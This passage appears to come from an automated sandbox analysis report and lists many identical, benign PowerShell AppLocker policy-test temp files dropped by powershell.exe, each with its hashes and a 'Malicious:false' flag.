                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3w1er2ou.oph.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_44wnpvkr.ogj.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4fzabw5v.aoy.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4pmpyyrc.xtm.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4t3bpdfm.s23.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4xh1t2c4.32c.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_51fzctz3.j5o.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5dwbvhch.gxu.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5icws2k1.mnf.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5nl5t333.0be.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5qpumjyg.reb.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5uaakkla.fke.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ud4ktbg.2jd.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a0o5hhn1.wiq.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_alkn35yu.rvo.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bflyuhyl.qmz.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bqotphtj.tqn.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_buptl1hi.srm.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cvufriur.3k4.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czuhwxen.jn4.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dvkbuffn.vae.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dxobckae.anj.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e4vnh0nq.1pw.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eguk4dhj.kvt.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ewmd2nel.1zh.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f5nko2md.ud2.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_frvctbor.lel.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g10emu5q.esr.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gclbt2rt.q1g.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmxtjo3v.24j.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j45ri4ay.0lj.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
